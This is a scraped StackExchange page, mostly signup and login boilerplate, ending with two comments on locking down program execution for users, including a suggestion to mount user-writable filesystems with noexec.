StackExchange.ready(function ()
StackExchange.helpers.onClickDraftSave('#login-link');
);
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Post as a guest
Required, but never shown
Sign up or log in
StackExchange.ready(function ()
StackExchange.helpers.onClickDraftSave('#login-link');
);
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Post as a guest
Required, but never shown
Required, but never shown
Required, but never shown
Required, but never shown
Required, but never shown
Required, but never shown
Required, but never shown
Required, but never shown
Required, but never shown
4
To disable execution in this manner would prohibit users from being able to do anything on system. There is no mechanism for this in-built to the system or even with third party software that I am aware of to do this type of security lockdown
– Thomas Ward♦
14 hours ago
not answering but hint what you can do: add noexec on user writable mounts. wont prevent scripts but actual binary execution.
– Sampo Sarrala
1 hour ago